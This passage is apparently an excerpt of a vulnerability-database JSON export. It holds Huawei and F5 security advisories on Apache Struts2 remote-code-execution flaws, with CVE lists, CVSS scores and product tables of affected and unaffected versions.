"wallarmlab", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2251", "CVE-2012-0391", "CVE-2008-6504", "CVE-2012-0838", "CVE-2016-0785", "CVE-2010-1870", "CVE-2013-1965", "CVE-2012-4387", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2016-3093"], "modified": "2017-03-10T16:52:09", "href": "https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2?source=rss----49b51199b3da---4", "id": "WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "huawei": [{"lastseen": "2023-09-28T08:30:37", "description": "Apache Struts2 is a second-generation and enterprise-ready Java web application framework based on the Model-View-Controller (MVC) architecture. This advisory describes four vulnerabilities of Apache Struts 2.0.0 - 2.3.15. Huawei products and applications using the above versions of Apache Struts are therefore affected by the vulnerabilities, not due to a defect of the Huawei product or application.\n\nThe Apache Struts2 contains the vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks.( Vulnerability ID : HWNSIRT-2013-0601) The link is at [http://struts.apache.org/release/2.3.x/docs/s2-014.html ](<http://struts.apache.org/release/2.3.x/docs/s2-014.html%20>)(CVE-2013-2115, CVE-2013-1966)\n\nThe Apache Struts2 contains the vulnerability introduced by wildcard matching mechanism or double evaluation of OGNL Expression allows remote command execution.( Vulnerability ID : HWNSIRT-2013-0704) The link is at <http://struts.apache.org/release/2.3.x/docs/s2-015.html> (CVE-2013-2134, CVE-2013-2135)\n\nThe Apache Struts2 contains the vulnerability introduced by manipulating parameters prefixed with \"action:\"/\"redirect:\"/\"redirectAction:\", which may result in remote command execution. (Vulnerability ID : HWNSIRT-2013-0705) .The link is at <http://struts.apache.org/release/2.3.x/docs/s2-016.html> ([CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>)).\n\nThe Apache Struts2 contains the vulnerability introduced by manipulating parameters prefixed with \"redirect:\"/\"redirectAction:\" which allows open redirects. (Vulnerability ID : HWNSIRT-2013-0706). The link is at <http://struts.apache.org/release/2.3.x/docs/s2-017.html> (CVE-2013-2248). \n\nApache released Struts 2.3.15.1 as an official patch for Struts 2. Upgrading to Struts 2.3.15.1 is the only workaround. Based on the Struts 2.3.15.1 patch, Huawei provides a fix for the vulnerability. \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-07-30T00:00:00", "type": "huawei", "title": "Security Advisory-Multiple Apache Struts2 Vulnerabilities in Huawei Products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2014-01-08T00:00:00", "id": "HUAWEI-SA-20130730-STRUTS", "href": "https://www.huawei.com/en/psirt/security-advisories/2013/hw-276819", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-27T20:53:41", "description": "Some versions of Apache Struts2 software used in Huawei devices have security vulnerabilities. A patch released for the software to fix vulnerabilities CVE-2014-0050 and CVE-2014-0094 has the risk of being bypassed. (Vulnerability ID: HWPSIRT-2014-0420)\n\nThis Vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID: CVE-2014-0116.\n", "cvss3": {}, "published": "2014-07-07T00:00:00", "type": "huawei", "title": "Security Advisory-Apache Struts2 vulnerability on Huawei multiple products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0116"], "modified": "2014-07-08T00:00:00", "id": "HUAWEI-SA-20140707-01-STRUTS2", "href": "https://www.huawei.com/en/psirt/security-advisories/2014/hw-350733", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2017-06-08T00:16:02", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {}, "published": "2017-02-09T01:52:00", "type": "f5", "title": "Apache Struts 2 vulnerabilities CVE-2013-1966, CVE-2013-2115, CVE-2013-2134, and CVE-2013-2135", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135"], "modified": "2017-02-10T04:50:00", "id": "F5:K10506844", "href": "https://support.f5.com/csp/article/K10506844", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-09-29T13:19:18", "description": " \n\n\nParametersInterceptor in Apache Struts before 2.3.16.2 does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. ([CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>)) \n\n\nImpact \n\n\nNone. F5 products do not use the affected Apache Struts version. \n\n", "cvss3": {}, "published": "2014-05-15T15:23:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2014-0112", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113"], "modified": "2016-01-08T23:14:00", "id": "F5:K15261", "href": "https://support.f5.com/csp/article/K15261", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-29T13:18:47", "description": " \n\n\nCookieInterceptor in Apache Struts before 2.3.16.2, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. ([CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>)) \n\n\nImpact \n\n\nNone. F5 products do not use the affected Apache Struts version. \n\n", "cvss3": {}, "published": "2014-05-15T17:36:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2014-0113", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113"], "modified": "2016-01-08T23:14:00", "id": "F5:K15262", "href": "https://support.f5.com/csp/article/K15262", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:23:08", "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "cvss3": {}, "published": "2014-05-15T00:00:00", "type": "f5", "title": "SOL15261 - Apache Struts vulnerability CVE-2014-0112", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "id": "SOL15261", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15261.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:09", "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "cvss3": {}, "published": "2014-05-15T00:00:00", "type": "f5", "title": "SOL15262 - Apache Struts vulnerability CVE-2014-0113", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "id": "SOL15262", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15262.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:18", "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "cvss3": {}, "published": "2014-05-15T00:00:00", "type": "f5", "title": "SOL15260 - Apache Struts vulnerability CVE-2014-0094", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "id": "SOL15260", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15260.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-09-05T15:58:37", "description": " \n\n\nThe ParametersInterceptor in Apache Struts before 2.3.16.1 allows remote attackers to "manipulate" the ClassLoader via the class parameter, which is passed to the getClass method. ([CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>)) \n\n\nImpact \n\n\nNone. F5 products do not use the affected Apache Struts version. \n\n", "cvss3": {}, "published": "2014-05-15T17:36:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2014-0094", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113"], "modified": "2016-01-08T23:14:00", "id": "F5:K15260", "href": "https://support.f5.com/csp/article/K15260", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:22:57", "description": "Recommended action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n", "cvss3": {}, "published": "2014-01-20T00:00:00", "type": "f5", "title": "SOL14933 - Apache Struts vulnerability CVE-2013-2251", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-16T00:00:00", "id": "SOL14933", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/900/sol14933.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-02-08T16:15:37", "description": " * [CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \nForced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.\n * [CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \nThe fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag's attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n\nImpact\n\nUsing a forced Object-Graph Navigation Language (OGNL) evaluation on untrusted user input allows an attacker to perform remote code execution leading to security degradation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-22T01:45:00", "type": "f5", "title": "Apache Struts vulnerabilities CVE-2020-17530 and CVE-2021-31805", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-15T23:18:00", "id": "F5:K24608264", "href": "https://support.f5.com/csp/article/K24608264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-06-08T00:16:33", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 \n11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-26T02:09:00", "type": "f5", "title": "Apache Struts vulnerabilities CVE-2016-0785, CVE-2016-2162, CVE-2016-3081, CVE-2016-3082, and CVE-2016-4003", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3082", "CVE-2016-0785", "CVE-2016-2162", "CVE-2016-4003", "CVE-2016-3081"], "modified": "2017-03-13T23:05:00", "id": "F5:K17588029", "href": "https://support.f5.com/csp/article/K17588029", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:59", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-25T00:00:00", "type": "f5", "title": "SOL17588029 - Apache Struts vulnerabilities CVE-2016-0785, CVE-2016-2162, CVE-2016-3081, CVE-2016-3082, and CVE-2016-4003", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3082", "CVE-2016-0785", "CVE-2016-2162", "CVE-2016-4003", "CVE-2016-3081"], "modified": "2016-04-29T00:00:00", "id": "SOL17588029", "href": "http://support.f5.com/kb/en-us/solutions/public/k/17/sol17588029.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-22T12:31:57", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not Vulnerable | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP 